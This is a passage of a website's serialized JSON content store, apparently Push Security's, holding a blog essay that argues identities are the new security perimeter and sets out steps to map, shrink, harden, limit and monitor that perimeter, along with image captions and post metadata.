605,"value":126564,"nodeType":173},{},[],{"data":161607,"content":161608,"nodeType":178},{},[161609],{"data":161610,"marks":161611,"value":126571,"nodeType":173},{},[],{"data":161613,"content":161616,"nodeType":312},{"target":161614},{"sys":161615},{"id":126576,"type":317,"linkType":318},[],{"data":161618,"content":161619,"nodeType":231},{},[],{"data":161621,"content":161622,"nodeType":169},{},[161623],{"data":161624,"marks":161625,"value":126587,"nodeType":173},{},[],{"data":161627,"content":161628,"nodeType":178},{},[161629,161632,161638],{"data":161630,"marks":161631,"value":126594,"nodeType":173},{},[],{"data":161633,"content":161634,"nodeType":186},{"uri":473},[161635],{"data":161636,"marks":161637,"value":126601,"nodeType":173},{},[],{"data":161639,"marks":161640,"value":126605,"nodeType":173},{},[],{"entries":161642},{"hyperlink":161643,"inline":161644,"block":161645},[],[],[161646,161653,161657,161661,161664,161691,161697,161703],{"sys":161647,"__typename":5345,"title":161648,"caption":161649,"layoutMode":118,"file":161650},{"id":125630},"Managed vs. unmanaged IdPs","Managed IdPs can be administered centrally by the organization (which owns and operates the IdP and the identities on it), whereas unmanaged ‘social’ IdPs are controlled by the vendor, and identities are owned and administered by the user.",{"url":161651,"width":11961,"height":161652},"https://images.ctfassets.net/y1cdw1ablpvd/6qDjvYcLbUxlC4w24VvDLO/4da66c4e755c9b1c00b285a5ab3f9c57/image1.png",1000,{"sys":161654,"__typename":5345,"title":161655,"caption":161655,"layoutMode":118,"file":161656},{"id":125738},"Customizable block screen that end-users will see if they attempt to enter their SSO password into any login that’s not their IdP.",{"url":46399,"width":11967,"height":46400},{"sys":161658,"__typename":5345,"title":132208,"caption":161659,"layoutMode":118,"file":161660},{"id":125935},"How Push stops phishing attacks with layered anti-phishing controls.",{"url":132211,"width":132212,"height":132213},{"sys":161662,"__typename":5345,"title":121109,"caption":121109,"layoutMode":118,"file":161663},{"id":105035},{"url":121111,"width":23880,"height":100678},{"sys":161665,"__typename":5311,"content":161666,"name":161690,"title":118},{"id":126196},{"json":161667},{"data":161668,"content":161669,"nodeType":165},{},[161670],{"data":161671,"content":161672,"nodeType":178},{},[161673,161677,161686],{"data":161674,"marks":161675,"value":161676,"nodeType":173},{},[],"A bonus for Panther users: Push also ",{"data":161678,"content":161680,"nodeType":186},{"uri":161679},"https://pushsecurity.com/blog/combining-the-powers-of-push-and-panther-to-stop-identity-attacks/",[161681],{"data":161682,"marks":161683,"value":161685,"nodeType":173},{},[161684],{"type":194},"partnered with Panther",{"data":161687,"marks":161688,"value":161689,"nodeType":173},{},[]," last year to deliver a detection pack for identity attacks, including for session token theft events, which will get you up and running quickly in your SIEM without needing to write custom detections.","A bonus for Panther users: Push also partnered with Panther last year to deliver a detection pack for identity attacks, including for session token theft events, which will get you up and running quickly in your SIEM.",{"sys":161692,"__typename":5345,"title":161693,"caption":161694,"layoutMode":118,"file":161695},{"id":126332},"How Push identifies verified stolen credential detections in use across workforce identities","How Push identifies verified stolen credential detections in use across workforce identities.",{"url":161696,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/6jg3sNxb7fQe1Hqj18yfb2/c11687d77697c0ecc09aaefab0ef435c/image3.png",{"sys":161698,"__typename":5345,"title":161699,"caption":161700,"layoutMode":118,"file":161701},{"id":126490},"App banner require reason mode","App banners \"require reason\" mode.",{"url":161702,"width":6852,"height":5400},"https://images.ctfassets.net/y1cdw1ablpvd/3ZWyyglvBRrvY6bCZWidMM/fcb34c101d390f5315c70e8cb6486a26/banner_branded_reason.png",{"sys":161704,"__typename":5345,"title":161705,"caption":161706,"layoutMode":118,"file":161707},{"id":126576},"MFA enforcement feature in action. ","MFA enforcement feature in action.",{"url":46392,"width":46393,"height":46394},"content:blog:push-features-2024.json","blog/push-features-2024.json","blog/push-features-2024",{"_path":161712,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":161713,"ogImage":118,"summary":161715,"title":46328,"subtitle":118,"metaTitle":161726,"synopsis":161727,"hashTags":118,"publishedDate":161728,"slug":46329,"tagsCollection":161729,"relatedBlogPostsCollection":161735,"authorsCollection":163273,"content":163277,"_id":164529,"_type":5439,"_source":5440,"_file":164530,"_stem":164531,"_extension":5439},"/blog/guide-to-secure-browser-extension-deployment",{"id":24933,"publishedAt":161714},"2025-01-14T13:09:53.616Z",{"json":161716},{"data":161717,"content":161718,"nodeType":165},{},[161719],{"data":161720,"content":161721,"nodeType":178},{},[161722],{"data":161723,"marks":161724,"value":161725,"nodeType":173},{},[],"This blog is intended as a resource for other extension developers looking to improve the security of their extension in the wake of the Cyberhaven attacks. ","How to securely deploy browser extensions to the web store","How extension developers can improve their security controls to prevent extension compromise.","2025-01-14T00:00:00.000Z",{"items":161730},[161731,161733],{"sys":161732,"name":26137},{"id":26136},{"sys":161734,"name":509},{"id":508},{"items":161736},[161737,162441,162723],{"__typename":1528,"sys":161738,"content":161740,"title":162427,"synopsis":162428,"hashTags":118,"publishedDate":162429,"slug":162430,"tagsCollection":162431,"authorsCollection":162437},{"id":161739},"6rflXTFCRMvmM8JU8ZPSCt",{"json":161741},{"nodeType":165,"data":161742,"content":161743},{},[161744,161751,161758,161765,161772,161779,161786,161792,161799,161806,161813,161820,161836,161843,161850,161857,161864,161871,161878,161885,161891,161898,161905,161912,161919,161925,161933,161940,161947,161954,161961,161969,161976,161982,161989,161996,162019,162026,162059,162066,162082,162090,162097,162104,162111,162118,162171,162178,162184,162191,162198,162205,162213,162220,162227,162234,162264,162271,162305,162312,162319,162326,162333,162341,162348,162355,162362,162369,162376,162383,162390,162397,162415,162421],{"nodeType":169,"data":161745,"content":161746},{},[161747],{"nodeType":173,"value":161748,"marks":161749,"data":161750},"What is in an identity?",[],{},{"nodeType":178,"data":161752,"content":161753},{},[161754],{"nodeType":173,"value":161755,"marks":161756,"data":161757},"Like real identities, digital identities are a little hard to define. Formally it’s a mapping of a human into the digital world, but more often this term is used as synonymous with a credential (e.g. a username and password, a Multi-Factor Authentication (MFA) device, or a fingerprint) - the thing you use to prove you own the identity in an authentication process. When people say an identity is breached, they typically mean the credentials have been stolen.",[],{},{"nodeType":178,"data":161759,"content":161760},{},[161761],{"nodeType":173,"value":161762,"marks":161763,"data":161764},"This is a useful simplification, but bear in mind that reality is a bit more complex. For example - identities are typically tied to an account on an application (you want to login to Slack, Slack knows your password), but can also trust a third party (an Identity Provider or IdP) to authenticate an identity on your behalf in what’s known as federation (“login with Google” on Slack).",[],{},{"nodeType":178,"data":161766,"content":161767},{},[161768],{"nodeType":173,"value":161769,"marks":161770,"data":161771},"Surprisingly, it’s very common for modern apps to allow a user to authenticate to the same account using a local credential (a username and password) and a federated identity (e.g. the “login with Google” or “login with Microsoft” buttons) interchangeably.",[],{},{"nodeType":178,"data":161773,"content":161774},{},[161775],{"nodeType":173,"value":161776,"marks":161777,"data":161778},"That’s how you could wind up with multiple identities tied to a single account, or multiple accounts tied to a single federated identity. This is exactly what you see for real users - and every weird in-between case to boot.",[],{},{"nodeType":169,"data":161780,"content":161781},{},[161782],{"nodeType":173,"value":161783,"marks":161784,"data":161785},"The “new perimeter” … from a red-teamer’s perspective",[],{},{"nodeType":178,"data":161787,"content":161788},{},[161789],{"nodeType":173,"value":37,"marks":161790,"data":161791},[],{},{"nodeType":178,"data":161793,"content":161794},{},[161795],{"nodeType":173,"value":161796,"marks":161797,"data":161798},"To see how identities are the new thing, it helps to see how we got here.",[],{},{"nodeType":235,"data":161800,"content":161801},{},[161802],{"nodeType":173,"value":161803,"marks":161804,"data":161805},"The good old days",[],{},{"nodeType":178,"data":161807,"content":161808},{},[161809],{"nodeType":173,"value":161810,"marks":161811,"data":161812},"A couple of decades ago, I was just getting started as a red-teamer or penetration tester, or whatever you want to call it. The job is to do what real attackers do so clients could understand the attack techniques and better defend against them. The most stressful part of each project was the first step - getting initial access to the target - getting past their perimeter and into the (usually) soft internals.",[],{},{"nodeType":178,"data":161814,"content":161815},{},[161816],{"nodeType":173,"value":161817,"marks":161818,"data":161819},"A security perimeter is a boundary at which controls can be enforced. From an offensive perspective, a security perimeter is the same as an attack surface: where you can target initial attacks to gain a foothold, from which you can launch further attacks. I use perimeter and attack surface interchangeably going forward.",[],{},{"nodeType":178,"data":161821,"content":161822},{},[161823,161827,161832],{"nodeType":173,"value":161824,"marks":161825,"data":161826},"A perimeter can be physical, like a wall around a house, or virtual like the network boundary between an internal network and the internet where controls are things like firewalls. A couple of decades ago this internet network boundary was ",[],{},{"nodeType":173,"value":161828,"marks":161829,"data":161831},"the",[161830],{"type":1646},{},{"nodeType":173,"value":161833,"marks":161834,"data":161835}," perimeter. As any decent red-teamer during this era, we had a pretty well-oiled process of mapping a client’s external network, scanning it for services, and then identifying and exploiting known vulnerabilities in those services. With this foothold on a target network, we could pivot to other, more sensitive internal systems.",[],{},{"nodeType":178,"data":161837,"content":161838},{},[161839],{"nodeType":173,"value":161840,"marks":161841,"data":161842},"Blue teams started having success with automated vulnerability scanning and patching programs, during this time. Then red teams responded by focusing on finding new vulnerabilities, especially in custom code like web applications. I fondly remember using techniques like xp_cmdshell with SQL injection to get access to breach perimeter systems and get access to internal networks. As DMZs, SDLC, vuln scanning and a dozen other tactics became generally adopted things improved to the point where those standard red-team playbooks weren’t working anymore. ",[],{},{"nodeType":235,"data":161844,"content":161845},{},[161846],{"nodeType":173,"value":161847,"marks":161848,"data":161849},"The shift to targeting users and their endpoints",[],{},{"nodeType":178,"data":161851,"content":161852},{},[161853],{"nodeType":173,"value":161854,"marks":161855,"data":161856},"About a decade ago, attackers realized it was easier to breach the perimeter and gain access to internal networks by simply targeting users with endpoints directly connected to the internal network. At the time the main techniques were email phishing and malicious web pages delivering exploits or straight malware. We put down Burp and our other web app testing tools and started spending our time crafting phishing emails with malicious macro-laden Microsoft Office documents for that initial entrypoint.",[],{},{"nodeType":178,"data":161858,"content":161859},{},[161860],{"nodeType":173,"value":161861,"marks":161862,"data":161863},"Defenders were on the back foot and even back then the “train your employees to spot attacks” advice felt as totally unrealistic as it’s now proved to be. The zeitgeist suggested, \"Attackers only need to succeed once; defenders must succeed every time.\" Defenders were blind and the focus was firmly on detection. Much much better telemetry was needed, which spawned the endpoint detection and response (EDR) revolution. ",[],{},{"nodeType":178,"data":161865,"content":161866},{},[161867],{"nodeType":173,"value":161868,"marks":161869,"data":161870},"EDR required immediate changes to red team tactics, and together with better endpoint security defaults, automatic OS updates (that actually started working) and memory exploit protections (things like DEP and ASLR) the timelines for successful attacks were stretching a lot.",[],{},{"nodeType":235,"data":161872,"content":161873},{},[161874],{"nodeType":173,"value":161875,"marks":161876,"data":161877},"The modern perimeter",[],{},{"nodeType":178,"data":161879,"content":161880},{},[161881],{"nodeType":173,"value":161882,"marks":161883,"data":161884},"Attackers have had to change tactics yet again, due to the rising cost of attacking endpoints and the fact that data has moved off endpoints and internal networks and onto cloud systems or Software as a Service (SaaS) applications.",[],{},{"nodeType":312,"data":161886,"content":161890},{"target":161887},{"sys":161888},{"id":161889,"type":317,"linkType":318},"79wGG37CY7aBdRrdjO5eQY",[],{"nodeType":178,"data":161892,"content":161893},{},[161894],{"nodeType":173,"value":161895,"marks":161896,"data":161897},"Identities have always existed as a target for attackers and were a critical part of the kill chain, but they used to be protected by some other perimeter, be that a network perimeter or an endpoint perimeter. ",[],{},{"nodeType":178,"data":161899,"content":161900},{},[161901],{"nodeType":173,"value":161902,"marks":161903,"data":161904},"This has fundamentally changed as modern work applications are now directly exposed to the internet  - and the only thing needed to access these apps are identities. That means identities are now no longer the second or third target but the initial target, the new perimeter.",[],{},{"nodeType":169,"data":161906,"content":161907},{},[161908],{"nodeType":173,"value":161909,"marks":161910,"data":161911},"Securing the (identity) perimeter",[],{},{"nodeType":178,"data":161913,"content":161914},{},[161915],{"nodeType":173,"value":161916,"marks":161917,"data":161918},"To understand how we can protect this new perimeter, I’ll discuss the general approach to securing any perimeter, and then how this applies to the identity attack surface.",[],{},{"nodeType":312,"data":161920,"content":161924},{"target":161921},{"sys":161922},{"id":161923,"type":317,"linkType":318},"c0YSk60vVULBPorLkkBPL",[],{"nodeType":235,"data":161926,"content":161927},{},[161928],{"nodeType":173,"value":161929,"marks":161930,"data":161932},"1. Map your perimeter",[161931],{"type":370},{},{"nodeType":178,"data":161934,"content":161935},{},[161936],{"nodeType":173,"value":161937,"marks":161938,"data":161939},"It’s impossible to secure what you don’t know about. Whether your perimeter is made of network services, user endpoints or identities, you must know what they are before you can implement controls to protect them, and crucially, verify those controls are effective.",[],{},{"nodeType":178,"data":161941,"content":161942},{},[161943],{"nodeType":173,"value":161944,"marks":161945,"data":161946},"In a traditional network setting, you might ask IT to inventory public network ranges, domains you own, and internet facing servers and services to get visibility into your attack surface. This is a pretty complex task and lots of the static inventory will quickly become outdated and incomplete. That’s why many orgs will perform network discovery activities to find internet-exposed network services, using anything from basic network scans to find onsite or self-hosted services to querying APIs in cloud infrastructure platforms (like AWS or Azure).",[],{},{"nodeType":178,"data":161948,"content":161949},{},[161950],{"nodeType":173,"value":161951,"marks":161952,"data":161953},"There are parallels in the identity perimeter space, like querying Identity Providers (IdPs like Entra/AzureAD or Okta) for federated identities to map the attack surface. Unfortunately there is no equivalent to scanning your public network ranges for identities, since you can’t scan or query an app to find accounts on your domain (would that we could!). This problem is compounded by the fact that while IT and developers are typically the only ones that can create and expose new network services, most apps allow any employee to create a new identity by signing up to a free account outside your SSO solution.",[],{},{"nodeType":178,"data":161955,"content":161956},{},[161957],{"nodeType":173,"value":161958,"marks":161959,"data":161960},"Knowing your perimeter without a technical solution is going to be a very hit and miss affair. To have confidence that you understand your identity perimeter, you need an inventory solution that can discover SSO identities (the easy part), as well as identities created outside SSO, like local accounts those employees created just by signing up. To secure identities it’s not enough to know that an employee is accessing an app website, you need to know if they are logged in and what identity they are using (is the username a company email or personal gmail?) or you’ll be dealing with endless false positives.",[],{},{"nodeType":235,"data":161962,"content":161963},{},[161964],{"nodeType":173,"value":161965,"marks":161966,"data":161968},"2. Reduce the size of your attack surface",[161967],{"type":370},{},{"nodeType":178,"data":161970,"content":161971},{},[161972],{"nodeType":173,"value":161973,"marks":161974,"data":161975},"Once you have an idea of what makes up your perimeter, it’s generally a good idea to make it as small as possible. If you halve the number of network services an attacker can target, that means you can spend twice as long per service to secure the ones that remain - the same goes for identities!",[],{},{"nodeType":312,"data":161977,"content":161981},{"target":161978},{"sys":161979},{"id":161980,"type":317,"linkType":318},"2XZ5vADLzuEnc2aAdZrkbO",[],{"nodeType":178,"data":161983,"content":161984},{},[161985],{"nodeType":173,"value":161986,"marks":161987,"data":161988},"To start this process, remove unused or unnecessary targets from the perimeter. ",[],{},{"nodeType":178,"data":161990,"content":161991},{},[161992],{"nodeType":173,"value":161993,"marks":161994,"data":161995},"On a network perimeter that might mean:",[],{},{"nodeType":250,"data":161997,"content":161998},{},[161999,162009],{"nodeType":254,"data":162000,"content":162001},{},[162002],{"nodeType":178,"data":162003,"content":162004},{},[162005],{"nodeType":173,"value":162006,"marks":162007,"data":162008},"Shutting down unused servers or",[],{},{"nodeType":254,"data":162010,"content":162011},{},[162012],{"nodeType":178,"data":162013,"content":162014},{},[162015],{"nodeType":173,"value":162016,"marks":162017,"data":162018},"Firewalling services that don’t need to be exposed to the internet.",[],{},{"nodeType":178,"data":162020,"content":162021},{},[162022],{"nodeType":173,"value":162023,"marks":162024,"data":162025},"In the identity space, you might:",[],{},{"nodeType":250,"data":162027,"content":162028},{},[162029,162039,162049],{"nodeType":254,"data":162030,"content":162031},{},[162032],{"nodeType":178,"data":162033,"content":162034},{},[162035],{"nodeType":173,"value":162036,"marks":162037,"data":162038},"Make sure new accounts use existing federated identities,",[],{},{"nodeType":254,"data":162040,"content":162041},{},[162042],{"nodeType":178,"data":162043,"content":162044},{},[162045],{"nodeType":173,"value":162046,"marks":162047,"data":162048},"Delete or disable unused SSO identities on your IdP, or ",[],{},{"nodeType":254,"data":162050,"content":162051},{},[162052],{"nodeType":178,"data":162053,"content":162054},{},[162055],{"nodeType":173,"value":162056,"marks":162057,"data":162058},"Manually delete unnecessary user accounts on work apps.",[],{},{"nodeType":178,"data":162060,"content":162061},{},[162062],{"nodeType":173,"value":162063,"marks":162064,"data":162065},"Manually deleting an unmanaged local identity on an app, e.g. after an employee leaves your org, is a (very) non-trivial task. This is because you often don’t known of the accounts and don't have access to manage the account (the IT or security team aren’t admin on the app tenant where it exists). You might have access to the user’s mailbox and be able to get access to the account by going through an account recovery flow and delete the account that way - but this is very time consuming and even more difficult if the user enabled MFA (which is what you want them to do!).",[],{},{"nodeType":178,"data":162067,"content":162068},{},[162069,162073,162078],{"nodeType":173,"value":162070,"marks":162071,"data":162072},"Given the difficulty of managing these accounts, a better strategy is to ",[],{},{"nodeType":173,"value":162074,"marks":162075,"data":162077},"make sure they never exist in the first place",[162076],{"type":370},{},{"nodeType":173,"value":162079,"marks":162080,"data":162081},". If you find you have lots of identities on an app you may decide the risk warrants IT effort and you can take over management of the app and integrate it with your IdP solution - or ask employees to use an alternative app instead. You can also use browser-based technical controls to prevent users from creating local identities in the first place.",[],{},{"nodeType":235,"data":162083,"content":162084},{},[162085],{"nodeType":173,"value":162086,"marks":162087,"data":162089},"3. Harden the perimeter",[162088],{"type":370},{},{"nodeType":178,"data":162091,"content":162092},{},[162093],{"nodeType":173,"value":162094,"marks":162095,"data":162096},"Once you’ve made the perimeter as small as possible, the next step is to make it more difficult to breach that perimeter. Similar to the other objectives, but especially here, there are two sides to this. First the implementation; you have processes, configuration standards, and tools to make sure network services are updated and securely configured. Virtually no one achieves success simply through implementing good processes, you must continually verify that these processes work and that it continues to work.",[],{},{"nodeType":178,"data":162098,"content":162099},{},[162100],{"nodeType":173,"value":162101,"marks":162102,"data":162103},"To verify network controls are in place and working you do something like vulnerability scanning, where you check the perimeter for known vulnerabilities that an attacker could exploit and gain a foothold on your internal network. You might even have a risk profile that means you are concerned about more targeted attacks and hire pentesters or run a bug-bounty program to find weaknesses that can’t be automatically discovered. Very few organizations with an external network of any significant size perform a vulnerability scan for the first time - even a low-quality automated one - and find no serious issues. ",[],{},{"nodeType":178,"data":162105,"content":162106},{},[162107],{"nodeType":173,"value":162108,"marks":162109,"data":162110},"In the identity space, the status-quo is to be content with making policies and implementing and configuring an SSO system without explicit verification that it works as it should. We should be following the same level of verification processes for the identity perimeter as we do/did for the endpoint and network perimeter. ",[],{},{"nodeType":178,"data":162112,"content":162113},{},[162114],{"nodeType":173,"value":162115,"marks":162116,"data":162117},"In this case, the vulnerabilities we are looking for aren’t unpatched systems or zero-days. Instead, we’re looking for:",[],{},{"nodeType":250,"data":162119,"content":162120},{},[162121,162131,162141,162151,162161],{"nodeType":254,"data":162122,"content":162123},{},[162124],{"nodeType":178,"data":162125,"content":162126},{},[162127],{"nodeType":173,"value":162128,"marks":162129,"data":162130},"Accounts without MFA, ",[],{},{"nodeType":254,"data":162132,"content":162133},{},[162134],{"nodeType":178,"data":162135,"content":162136},{},[162137],{"nodeType":173,"value":162138,"marks":162139,"data":162140},"Those using weak MFA methods that make them phish-able,",[],{},{"nodeType":254,"data":162142,"content":162143},{},[162144],{"nodeType":178,"data":162145,"content":162146},{},[162147],{"nodeType":173,"value":162148,"marks":162149,"data":162150},"Employees re-using the same password across multiple accounts, ",[],{},{"nodeType":254,"data":162152,"content":162153},{},[162154],{"nodeType":178,"data":162155,"content":162156},{},[162157],{"nodeType":173,"value":162158,"marks":162159,"data":162160},"Passwords that exist in public breach dumps,",[],{},{"nodeType":254,"data":162162,"content":162163},{},[162164],{"nodeType":178,"data":162165,"content":162166},{},[162167],{"nodeType":173,"value":162168,"marks":162169,"data":162170},"Identities that should be in SSO but aren’t.",[],{},{"nodeType":178,"data":162172,"content":162173},{},[162174],{"nodeType":173,"value":162175,"marks":162176,"data":162177},"It’s not yet standard practice to test or verify that identity controls are in place, but if the past has taught us anything it soon will be. You'd be surprised how many times we find that the MFA policies security teams thought they had in place, actually aren't.",[],{},{"nodeType":312,"data":162179,"content":162183},{"target":162180},{"sys":162181},{"id":162182,"type":317,"linkType":318},"4w5UZcf5hJ7ADuoT5W2tkC",[],{"nodeType":178,"data":162185,"content":162186},{},[162187],{"nodeType":173,"value":162188,"marks":162189,"data":162190},"Part of the reason for this lack of verification is due to lack of awareness. While identities used to be an internal thing that we protected with the network perimeter, online identities today are external and have slowly become the perimeter, almost without anyone noticing. While online identities are external, they are absolutely part of your attack surface and must be controlled and hardened to some extent.",[],{},{"nodeType":178,"data":162192,"content":162193},{},[162194],{"nodeType":173,"value":162195,"marks":162196,"data":162197},"Verifying controls is also really difficult, which is another reason we may not be making it a crucial step in the process. Customers feel that SSO solutions are security solutions and using security tools on security tools feel wrong. But it’s no different to vuln-scanning to ensure your firewalls are patched and don’t have default passwords. ",[],{},{"nodeType":178,"data":162199,"content":162200},{},[162201],{"nodeType":173,"value":162202,"marks":162203,"data":162204},"Verification can also be legally challenging because it’s not yet clear whether pentesters or red teamers are allowed to target online identities during assessments. Often these assets aren’t considered in scope during client assessments. This means these vulnerabilities rarely end up in pentest reports and therefore don’t enter many organization’s security or risk management processes. Since you own the identities (even on a third party identity solution or app) and are allowed to grant permission to the red team to use these identities, it seems to me that adding identities to the scope is distinct from bug hunting or vulnerability research on these apps (which is the legally challenging aspect). I would strongly recommend that you discuss including online identities with the red team as part of your next pentest.",[],{},{"nodeType":235,"data":162206,"content":162207},{},[162208],{"nodeType":173,"value":162209,"marks":162210,"data":162212},"4. Limit breach impact",[162211],{"type":370},{},{"nodeType":178,"data":162214,"content":162215},{},[162216],{"nodeType":173,"value":162217,"marks":162218,"data":162219},"The unfortunate reality is that regardless of what we do to harden a perimeter, there will always be a chance that breaches occur. The goal is to reduce that risk by minimizing the attack surface and hardening identities. ",[],{},{"nodeType":178,"data":162221,"content":162222},{},[162223],{"nodeType":173,"value":162224,"marks":162225,"data":162226},"When an attacker does get a foothold (by compromising an identity, for instance) you need to to restrict their further actions. Risk involves both the likelihood and the impact of an event. Previously, we focused on reducing the likelihood of breaches. Now, we're also aiming to lessen the impact if they do occur.",[],{},{"nodeType":178,"data":162228,"content":162229},{},[162230],{"nodeType":173,"value":162231,"marks":162232,"data":162233},"In our network perimeter story, we might think of using a DMZ network to restrict network access for systems exposed to the internet. A common example of a failure to limit impact on a Windows endpoint breach is having service accounts on all endpoints with Domain Administrator permission - which effectively turns a breach of any endpoint very quickly into a breach of every endpoint.",[],{},{"nodeType":178,"data":162235,"content":162236},{},[162237,162241,162250,162254,162260],{"nodeType":173,"value":162238,"marks":162239,"data":162240},"In an identity context, we need to think not only of the direct effect of an identity compromise (e.g. what data can this account read), but also of further lateral movement attacks. Consider this ",[],{},{"nodeType":186,"data":162242,"content":162244},{"uri":162243},"https://pushsecurity.com/blog/oktajacking/",[162245],{"nodeType":173,"value":162246,"marks":162247,"data":162249},"Oktajacking",[162248],{"type":194},{},{"nodeType":173,"value":162251,"marks":162252,"data":162253}," case study where a breached identity with admin permissions on an otherwise low-risk app which is connected to SSO can be used to perform a ",[],{},{"nodeType":186,"data":162255,"content":162256},{"uri":63250},[162257],{"nodeType":173,"value":63256,"marks":162258,"data":162259},[],{},{"nodeType":173,"value":162261,"marks":162262,"data":162263}," attack that compromises SSO credentials for all other users of the same low-risk app.",[],{},{"nodeType":178,"data":162265,"content":162266},{},[162267],{"nodeType":173,"value":162268,"marks":162269,"data":162270},"In contrast to traditional network or endpoint breaches, identity breaches are scoped to the permissions that the compromised account has. If an identity is compromised, whatever that identity is authorized to do is the scope of the breach. For example:",[],{},{"nodeType":250,"data":162272,"content":162273},{},[162274,162284],{"nodeType":254,"data":162275,"content":162276},{},[162277],{"nodeType":178,"data":162278,"content":162279},{},[162280],{"nodeType":173,"value":162281,"marks":162282,"data":162283},"If an identity with read access to a code repository was breached you might consider that all the source code (hopefully no secrets!) they had read access to was taken unless you can prove otherwise. This is often more difficult than you expect - last time I checked Github (by far the world's most popular source code repository app) logs didn’t include, for example, zipped repo downloads. ",[],{},{"nodeType":254,"data":162285,"content":162286},{},[162287],{"nodeType":178,"data":162288,"content":162289},{},[162290,162294,162302],{"nodeType":173,"value":162291,"marks":162292,"data":162293},"If an identity with write permission was compromised, you would also need to check all commits/changes to ensure no code was backdoored. The same applies for other apps - think of an identity with write access to a wiki being used to ",[],{},{"nodeType":186,"data":162295,"content":162297},{"uri":162296},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/link_backdooring/description.md",[162298],{"nodeType":173,"value":162299,"marks":162300,"data":162301},"drop links to phishing pages",[],{},{"nodeType":173,"value":1477,"marks":162303,"data":162304},[],{},{"nodeType":178,"data":162306,"content":162307},{},[162308],{"nodeType":173,"value":162309,"marks":162310,"data":162311},"For primary cloud collaboration platforms with complex data types (think O365 or Google Workspace) your IT team is likely already managing policies to limit the data that a user can read. For primary cloud hosting platforms your DevOps teams are likely maintaining policies to manage privileged access to production systems. The situation is typically very different for the few dozen high risk “core apps” beyond the 2 or 3 apps that receive a lot of attention and have dedicated teams.",[],{},{"nodeType":178,"data":162313,"content":162314},{},[162315],{"nodeType":173,"value":162316,"marks":162317,"data":162318},"Starting to review roles and permissions across the few dozen or so high-risk apps that are not as actively managed (or more likely self-managed by the teams using them) is a good way to start addressing the residual risk. The good news here is that most modern work apps use a much simpler permission model based largely around predefined roles like Owner, Admin, or Employee or similar variations. This means less flexibility, but also makes it a lot easier to manage permissions for identities on these apps - on balance, a good trade!",[],{},{"nodeType":178,"data":162320,"content":162321},{},[162322],{"nodeType":173,"value":162323,"marks":162324,"data":162325},"Consider this as part of your identity and access management review process. Something that used to be scoped around Active Directory group membership, but in a modern online identity context, now must be applied across many different work apps. ",[],{},{"nodeType":178,"data":162327,"content":162328},{},[162329],{"nodeType":173,"value":162330,"marks":162331,"data":162332},"Unless you want to try to get access to each tenant of each app and normalize this data into a mega-spreadsheet, you need access to this data in your identity inventory. This is an especially big challenge as teams find many of the apps they care about support authentication through SSO, but not authorization.",[],{},{"nodeType":235,"data":162334,"content":162335},{},[162336],{"nodeType":173,"value":162337,"marks":162338,"data":162340},"5. Detect and respond to attacks",[162339],{"type":370},{},{"nodeType":178,"data":162342,"content":162343},{},[162344],{"nodeType":173,"value":162345,"marks":162346,"data":162347},"Your last line of defense in protecting a perimeter is to monitor for attacks. It’s typically when controls and detections fail that breaches end in the news. ",[],{},{"nodeType":178,"data":162349,"content":162350},{},[162351],{"nodeType":173,"value":162352,"marks":162353,"data":162354},"Telemetry is the core building block of attack detection. Typically, you might ingest audit or event logs into a SIEM system. To detect attacks against identities, you’ll typically want to start with telemetry from SSO or IdP logs. These will provide some minimal coverage of many of the IT managed apps, but unfortunately attacks are more likely to happen on apps that aren’t SSO integrated, so we need a strategy to cover these as well. An identity inventory is a critical starting point to identify non-SSO apps from which you can collect event logs, as well as giving you visibility of the identities that are not covered.",[],{},{"nodeType":178,"data":162356,"content":162357},{},[162358],{"nodeType":173,"value":162359,"marks":162360,"data":162361},"Monitoring breaches for hosted work apps is different from other domains, largely because you are almost totally reliant on the app vendor to produce the telemetry. Unfortunately (I suspect primarily due to lack of customer demand), many apps don’t offer any centralized logging functionality at all, and those that do offer limited audit logs, or only do so on the top tier “enterprise” license plans. ",[],{},{"nodeType":178,"data":162363,"content":162364},{},[162365],{"nodeType":173,"value":162366,"marks":162367,"data":162368},"In the network or endpoint world, when you need more telemetry you have all the access you need to install software or hardware to generate that additional telemetry. You could put a network monitoring appliance in-line with your internet gateways or install an endpoint (EDR) agent to generate more telemetry than your router or endpoint OS will generate. You can add a proxy in front of an app for your users, but (except for a very small number of highly configurable apps) you can’t make attackers go through your proxy.",[],{},{"nodeType":178,"data":162370,"content":162371},{},[162372],{"nodeType":173,"value":162373,"marks":162374,"data":162375},"What you can do, however, is generate additional telemetry on what happens to your employee’s identities in the browser. This is possible through browser extensions which can be managed through the enterprise management features available for all mainstream browsers (Chrome, Edge, Firefox, Safari, Brave etc. etc.). This is incredibly powerful, and useful in directly detecting a range of identity attacks like phishing (is an employee trying to enter an SSO password into an app that isn’t the SSO login page?), but also through correlations with existing application or IdP logs that indicate account takeover (e.g. has there been a login event that wasn’t observed through the employee’s browser as well).",[],{},{"nodeType":169,"data":162377,"content":162378},{},[162379],{"nodeType":173,"value":162380,"marks":162381,"data":162382},"Same, but different",[],{},{"nodeType":178,"data":162384,"content":162385},{},[162386],{"nodeType":173,"value":162387,"marks":162388,"data":162389},"Whether we’re looking at the Verizon DBIR or just keeping up with security news, it’s clear that identity-based attacks are already responsible for a significant number of breaches. Attackers have started shifting their focus and security teams need to recognize this shift and adapt.",[],{},{"nodeType":178,"data":162391,"content":162392},{},[162393],{"nodeType":173,"value":162394,"marks":162395,"data":162396},"This doesn’t require that we fundamentally rethink security or anything that radical, just that we apply what we’ve learned over the last couple of decades to this new domain. There are some new technologies and protocols to understand, new tools are needed, but the fundamentals like authentication and authorization are already familiar to any security professional. ",[],{},{"nodeType":178,"data":162398,"content":162399},{},[162400,162404,162411],{"nodeType":173,"value":162401,"marks":162402,"data":162403},"If you follow what I’ve outlined here, a lot of the decisions we’ve made with building Push will make perfect sense. For example, you can’t make API integrations with apps to find identities when you don’t know about the apps or identities yet, so we needed a unique new data source. We use our own custom-built browser extension that’s force-deployed to your workforce, so we can observe employee identities as they are used in the browser. This gives us some pretty unique capabilities. If you found this interesting, follow us on ",[],{},{"nodeType":186,"data":162405,"content":162406},{"uri":117869},[162407],{"nodeType":173,"value":162408,"marks":162409,"data":162410},"Linkedin",[],{},{"nodeType":173,"value":162412,"marks":162413,"data":162414}," for more detailed blogs as we unpack this 